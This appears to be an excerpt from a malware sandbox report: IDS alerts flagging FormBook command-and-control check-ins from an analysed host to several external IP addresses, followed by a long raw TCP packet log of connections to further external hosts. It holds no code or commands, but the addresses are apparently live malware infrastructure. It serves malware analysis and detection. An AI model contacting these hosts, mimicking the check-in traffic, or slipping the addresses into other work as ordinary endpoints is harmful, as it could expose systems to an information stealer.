                    2024-09-22T17:41:30.632214+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49756 | 3.33.130.190 | 80 | TCP
                    2024-09-22T17:41:33.166974+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49757 | 3.33.130.190 | 80 | TCP
                    2024-09-22T17:41:33.166974+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49757 | 3.33.130.190 | 80 | TCP
                    2024-09-22T17:41:46.924343+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49758 | 199.59.243.227 | 80 | TCP
                    2024-09-22T17:41:49.395064+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49759 | 199.59.243.227 | 80 | TCP
                    2024-09-22T17:41:52.520986+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49760 | 199.59.243.227 | 80 | TCP
                    2024-09-22T17:41:54.448144+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49761 | 199.59.243.227 | 80 | TCP
                    2024-09-22T17:41:54.448144+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49761 | 199.59.243.227 | 80 | TCP
                    2024-09-22T17:42:00.094039+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49762 | 162.241.226.190 | 80 | TCP
                    2024-09-22T17:42:02.976646+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49763 | 162.241.226.190 | 80 | TCP
                    2024-09-22T17:42:05.325691+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49764 | 162.241.226.190 | 80 | TCP
                    2024-09-22T17:42:07.804051+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49765 | 162.241.226.190 | 80 | TCP
                    2024-09-22T17:42:07.804051+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49765 | 162.241.226.190 | 80 | TCP
                    2024-09-22T17:42:14.195272+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49766 | 91.215.85.23 | 80 | TCP
                    2024-09-22T17:42:16.718948+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49767 | 91.215.85.23 | 80 | TCP
                    2024-09-22T17:42:19.288646+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49768 | 91.215.85.23 | 80 | TCP
                    2024-09-22T17:42:21.791909+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49769 | 91.215.85.23 | 80 | TCP
                    2024-09-22T17:42:21.791909+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49769 | 91.215.85.23 | 80 | TCP
                    2024-09-22T17:42:27.767760+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49770 | 84.32.84.32 | 80 | TCP
                    2024-09-22T17:42:30.297965+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49771 | 84.32.84.32 | 80 | TCP
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Sep 22, 2024 17:39:56.257118940 CEST | 49736 | 80 | 192.168.2.4 | 34.150.58.73
                    Sep 22, 2024 17:39:56.263520002 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:56.263766050 CEST | 49736 | 80 | 192.168.2.4 | 34.150.58.73
                    Sep 22, 2024 17:39:56.272306919 CEST | 49736 | 80 | 192.168.2.4 | 34.150.58.73
                    Sep 22, 2024 17:39:56.279567957 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.205507040 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.205532074 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.205547094 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.205560923 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.205574036 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.205589056 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.205740929 CEST | 49736 | 80 | 192.168.2.4 | 34.150.58.73
                    Sep 22, 2024 17:39:57.205801010 CEST | 49736 | 80 | 192.168.2.4 | 34.150.58.73
                    Sep 22, 2024 17:39:57.206554890 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.206614017 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.206624985 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.206713915 CEST | 49736 | 80 | 192.168.2.4 | 34.150.58.73
                    Sep 22, 2024 17:39:57.207211971 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.207257986 CEST | 49736 | 80 | 192.168.2.4 | 34.150.58.73
                    Sep 22, 2024 17:39:57.211489916 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.211503029 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.211513996 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.211575985 CEST | 49736 | 80 | 192.168.2.4 | 34.150.58.73
                    Sep 22, 2024 17:39:57.212199926 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.212316036 CEST | 49736 | 80 | 192.168.2.4 | 34.150.58.73
                    Sep 22, 2024 17:39:57.411236048 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.411272049 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.411281109 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.411292076 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.411676884 CEST | 49736 | 80 | 192.168.2.4 | 34.150.58.73
                    Sep 22, 2024 17:39:57.416203976 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.416217089 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.416227102 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.416238070 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.416249037 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.416260958 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.416270018 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.416279078 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.416290045 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.416299105 CEST | 49736 | 80 | 192.168.2.4 | 34.150.58.73
                    Sep 22, 2024 17:39:57.416300058 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.416311026 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.416322947 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.416331053 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.416342020 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.416352987 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.416363001 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.416373014 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.416385889 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.416388035 CEST | 49736 | 80 | 192.168.2.4 | 34.150.58.73
                    Sep 22, 2024 17:39:57.416399002 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.416439056 CEST | 49736 | 80 | 192.168.2.4 | 34.150.58.73
                    Sep 22, 2024 17:39:57.416548014 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.416599035 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.416610003 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.416616917 CEST | 49736 | 80 | 192.168.2.4 | 34.150.58.73
                    Sep 22, 2024 17:39:57.416659117 CEST | 49736 | 80 | 192.168.2.4 | 34.150.58.73
                    Sep 22, 2024 17:39:57.416927099 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.416938066 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.416996002 CEST | 49736 | 80 | 192.168.2.4 | 34.150.58.73
                    Sep 22, 2024 17:39:57.616928101 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.617007017 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.617017031 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.617027044 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.617038965 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.617049932 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.617057085 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.617130041 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.617142916 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.617224932 CEST | 49736 | 80 | 192.168.2.4 | 34.150.58.73
                    Sep 22, 2024 17:39:57.617280960 CEST | 49736 | 80 | 192.168.2.4 | 34.150.58.73
                    Sep 22, 2024 17:39:57.617285013 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.617311001 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.617357016 CEST | 49736 | 80 | 192.168.2.4 | 34.150.58.73
                    Sep 22, 2024 17:39:57.617922068 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.617971897 CEST | 49736 | 80 | 192.168.2.4 | 34.150.58.73
                    Sep 22, 2024 17:39:57.617974997 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.617986917 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.618031979 CEST | 49736 | 80 | 192.168.2.4 | 34.150.58.73
                    Sep 22, 2024 17:39:57.618465900 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.618475914 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.618486881 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:39:57.618520975 CEST | 49736 | 80 | 192.168.2.4 | 34.150.58.73
                    Sep 22, 2024 17:39:57.618545055 CEST | 49736 | 80 | 192.168.2.4 | 34.150.58.73
                    Sep 22, 2024 17:39:57.624500036 CEST | 49736 | 80 | 192.168.2.4 | 34.150.58.73
                    Sep 22, 2024 17:39:57.629287004 CEST | 80 | 49736 | 34.150.58.73 | 192.168.2.4
                    Sep 22, 2024 17:40:20.928080082 CEST | 49738 | 80 | 192.168.2.4 | 195.24.68.25
                    Sep 22, 2024 17:40:20.933031082 CEST | 80 | 49738 | 195.24.68.25 | 192.168.2.4
                    Sep 22, 2024 17:40:20.933108091 CEST | 49738 | 80 | 192.168.2.4 | 195.24.68.25
                    Sep 22, 2024 17:40:20.944772959 CEST | 49738 | 80 | 192.168.2.4 | 195.24.68.25
                    Sep 22, 2024 17:40:20.949716091 CEST | 80 | 49738 | 195.24.68.25 | 192.168.2.4
                    Sep 22, 2024 17:40:21.658854008 CEST | 80 | 49738 | 195.24.68.25 | 192.168.2.4
                    Sep 22, 2024 17:40:21.658977032 CEST | 80 | 49738 | 195.24.68.25 | 192.168.2.4
                    Sep 22, 2024 17:40:21.659147024 CEST | 49738 | 80 | 192.168.2.4 | 195.24.68.25
                    Sep 22, 2024 17:40:22.458956003 CEST | 49738 | 80 | 192.168.2.4 | 195.24.68.25
                    Sep 22, 2024 17:40:23.478766918 CEST | 49739 | 80 | 192.168.2.4 | 195.24.68.25
                    Sep 22, 2024 17:40:23.483808041 CEST | 80 | 49739 | 195.24.68.25 | 192.168.2.4
                    Sep 22, 2024 17:40:23.483937025 CEST | 49739 | 80 | 192.168.2.4 | 195.24.68.25
                    Sep 22, 2024 17:40:23.504281044 CEST | 49739 | 80 | 192.168.2.4 | 195.24.68.25
                    Sep 22, 2024 17:40:23.509099960 CEST | 80 | 49739 | 195.24.68.25 | 192.168.2.4
                    Sep 22, 2024 17:40:24.215229034 CEST | 80 | 49739 | 195.24.68.25 | 192.168.2.4
                    Sep 22, 2024 17:40:24.215361118 CEST | 80 | 49739 | 195.24.68.25 | 192.168.2.4
                    Sep 22, 2024 17:40:24.215429068 CEST | 49739 | 80 | 192.168.2.4 | 195.24.68.25
                    Sep 22, 2024 17:40:25.005990028 CEST | 49739 | 80 | 192.168.2.4 | 195.24.68.25
                    Sep 22, 2024 17:40:26.024908066 CEST | 49740 | 80 | 192.168.2.4 | 195.24.68.25
                    Sep 22, 2024 17:40:26.030000925 CEST | 80 | 49740 | 195.24.68.25 | 192.168.2.4
                    Sep 22, 2024 17:40:26.030143023 CEST | 49740 | 80 | 192.168.2.4 | 195.24.68.25
                    Sep 22, 2024 17:40:26.042485952 CEST | 49740 | 80 | 192.168.2.4 | 195.24.68.25
                    Sep 22, 2024 17:40:26.048804045 CEST | 80 | 49740 | 195.24.68.25 | 192.168.2.4
                    Sep 22, 2024 17:40:26.048835993 CEST | 80 | 49740 | 195.24.68.25 | 192.168.2.4
                    Sep 22, 2024 17:40:26.048868895 CEST | 80 | 49740 | 195.24.68.25 | 192.168.2.4
                    Sep 22, 2024 17:40:26.048897982 CEST | 80 | 49740 | 195.24.68.25 | 192.168.2.4
                    Sep 22, 2024 17:40:26.048928022 CEST | 80 | 49740 | 195.24.68.25 | 192.168.2.4
                    Sep 22, 2024 17:40:26.049154043 CEST | 80 | 49740 | 195.24.68.25 | 192.168.2.4
                    Sep 22, 2024 17:40:26.049251080 CEST | 80 | 49740 | 195.24.68.25 | 192.168.2.4
                    Sep 22, 2024 17:40:26.049279928 CEST | 80 | 49740 | 195.24.68.25 | 192.168.2.4
                    Sep 22, 2024 17:40:26.049314022 CEST | 80 | 49740 | 195.24.68.25 | 192.168.2.4
                    Sep 22, 2024 17:40:26.891362906 CEST | 80 | 49740 | 195.24.68.25 | 192.168.2.4
                    Sep 22, 2024 17:40:26.891398907 CEST | 80 | 49740 | 195.24.68.25 | 192.168.2.4
                    Sep 22, 2024 17:40:26.891623020 CEST | 49740 | 80 | 192.168.2.4 | 195.24.68.25
                    Sep 22, 2024 17:40:27.552839994 CEST | 49740 | 80 | 192.168.2.4 | 195.24.68.25
                    Sep 22, 2024 17:40:28.572639942 CEST | 49741 | 80 | 192.168.2.4 | 195.24.68.25
                    Sep 22, 2024 17:40:28.577709913 CEST | 80 | 49741 | 195.24.68.25 | 192.168.2.4
                    Sep 22, 2024 17:40:28.577852964 CEST | 49741 | 80 | 192.168.2.4 | 195.24.68.25
                    Sep 22, 2024 17:40:28.588864088 CEST | 49741 | 80 | 192.168.2.4 | 195.24.68.25
                    Sep 22, 2024 17:40:28.593667984 CEST | 80 | 49741 | 195.24.68.25 | 192.168.2.4
                    Sep 22, 2024 17:40:29.297085047 CEST | 80 | 49741 | 195.24.68.25 | 192.168.2.4
                    Sep 22, 2024 17:40:29.297291994 CEST | 80 | 49741 | 195.24.68.25 | 192.168.2.4
                    Sep 22, 2024 17:40:29.297393084 CEST | 49741 | 80 | 192.168.2.4 | 195.24.68.25
                    Sep 22, 2024 17:40:29.353636980 CEST | 49741 | 80 | 192.168.2.4 | 195.24.68.25
                    Sep 22, 2024 17:40:29.360250950 CEST | 80 | 49741 | 195.24.68.25 | 192.168.2.4
                    Sep 22, 2024 17:40:34.491895914 CEST | 49742 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:34.496817112 CEST | 80 | 49742 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:34.496958971 CEST | 49742 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:34.508917093 CEST | 49742 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:34.513864994 CEST | 80 | 49742 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:35.188148022 CEST | 80 | 49742 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:35.188220978 CEST | 80 | 49742 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:35.188256979 CEST | 80 | 49742 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:35.188291073 CEST | 80 | 49742 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:35.188294888 CEST | 49742 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:35.188328028 CEST | 80 | 49742 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:35.188338041 CEST | 49742 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:35.188364029 CEST | 80 | 49742 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:35.188397884 CEST | 80 | 49742 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:35.188421011 CEST | 49742 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:35.188429117 CEST | 80 | 49742 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:35.188462019 CEST | 80 | 49742 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:35.188479900 CEST | 49742 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:35.188499928 CEST | 80 | 49742 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:35.188560963 CEST | 49742 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:35.193464994 CEST | 80 | 49742 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:35.193499088 CEST | 80 | 49742 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:35.193536043 CEST | 80 | 49742 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:35.193557978 CEST | 49742 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:35.193572044 CEST | 80 | 49742 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:35.193629980 CEST | 49742 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:35.193711042 CEST | 80 | 49742 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:35.239996910 CEST | 49742 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:35.279427052 CEST | 80 | 49742 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:35.279476881 CEST | 80 | 49742 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:35.279517889 CEST | 80 | 49742 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:35.279587984 CEST | 49742 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:35.279731989 CEST | 49742 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:36.021735907 CEST | 49742 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:37.040219069 CEST | 49743 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:37.045377970 CEST | 80 | 49743 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:37.045460939 CEST | 49743 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:37.057132959 CEST | 49743 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:37.062139034 CEST | 80 | 49743 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:37.650108099 CEST | 80 | 49743 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:37.650151968 CEST | 80 | 49743 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:37.650196075 CEST | 49743 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:37.650216103 CEST | 80 | 49743 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:37.650259972 CEST | 80 | 49743 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:37.650299072 CEST | 49743 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:37.650301933 CEST | 80 | 49743 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:37.650362968 CEST | 80 | 49743 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:37.650404930 CEST | 80 | 49743 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:37.650405884 CEST | 49743 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:37.650470972 CEST | 80 | 49743 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:37.650512934 CEST | 80 | 49743 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:37.650515079 CEST | 49743 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:37.650557041 CEST | 80 | 49743 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:37.650599957 CEST | 49743 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:37.655469894 CEST | 80 | 49743 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:37.655512094 CEST | 80 | 49743 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:37.655560970 CEST | 49743 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:37.655563116 CEST | 80 | 49743 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:37.655606985 CEST | 80 | 49743 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:37.655649900 CEST | 49743 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:37.716783047 CEST | 80 | 49743 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:37.741206884 CEST | 80 | 49743 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:37.741249084 CEST | 80 | 49743 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:37.741265059 CEST | 49743 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:37.741292953 CEST | 80 | 49743 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:37.741336107 CEST | 49743 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:38.568259001 CEST | 49743 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:39.587483883 CEST | 49744 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:39.592500925 CEST | 80 | 49744 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:39.592657089 CEST | 49744 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:39.606311083 CEST | 49744 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:39.611207962 CEST | 80 | 49744 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:39.611268044 CEST | 80 | 49744 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:39.611282110 CEST | 80 | 49744 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:39.611294985 CEST | 80 | 49744 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:39.611308098 CEST | 80 | 49744 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:39.611421108 CEST | 80 | 49744 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:39.611433983 CEST | 80 | 49744 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:39.611449003 CEST | 80 | 49744 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:39.611460924 CEST | 80 | 49744 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:40.218364000 CEST | 80 | 49744 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:40.218390942 CEST | 80 | 49744 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:40.218410015 CEST | 80 | 49744 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:40.218425989 CEST | 80 | 49744 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:40.218444109 CEST | 80 | 49744 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:40.218461037 CEST | 80 | 49744 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:40.218477964 CEST | 49744 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:40.218565941 CEST | 49744 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:40.218744993 CEST | 80 | 49744 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:40.218760014 CEST | 80 | 49744 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:40.218776941 CEST | 80 | 49744 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:40.218791008 CEST | 80 | 49744 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:40.218836069 CEST | 49744 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:40.218892097 CEST | 49744 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:40.225579977 CEST | 80 | 49744 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:40.225603104 CEST | 80 | 49744 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:40.225620031 CEST | 80 | 49744 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:40.225718975 CEST | 80 | 49744 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:40.225733995 CEST | 80 | 49744 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:40.225779057 CEST | 49744 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:40.225888014 CEST | 49744 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:40.312822104 CEST | 80 | 49744 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:40.312848091 CEST | 80 | 49744 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:40.312937021 CEST | 49744 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:40.313445091 CEST | 80 | 49744 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:40.313523054 CEST | 49744 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:41.115109921 CEST | 49744 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:42.134273052 CEST | 49745 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:42.139350891 CEST | 80 | 49745 | 162.0.213.94 | 192.168.2.4
                    Sep 22, 2024 17:40:42.139444113 CEST | 49745 | 80 | 192.168.2.4 | 162.0.213.94
                    Sep 22, 2024 17:40:42.147308111 CEST | 49745 | 80 | 192.168.2.4 | 162.0.213.94
